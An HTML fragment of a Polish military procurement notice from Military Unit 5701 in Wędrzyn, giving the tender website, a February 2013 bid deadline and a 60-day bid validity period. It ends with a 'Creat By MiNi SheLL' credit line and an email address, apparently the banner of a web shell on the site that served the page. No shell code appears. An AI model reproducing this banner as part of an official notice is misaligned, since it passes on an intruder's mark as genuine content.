<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.army.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 5701; 69-211 Wędzyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.02.2013 godzina 08:45, miejsce: Jednostka Wojskowwa 5701; 69-211 Wędrzyn; bud. 33 pok. 211- Kancelaria Jawna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com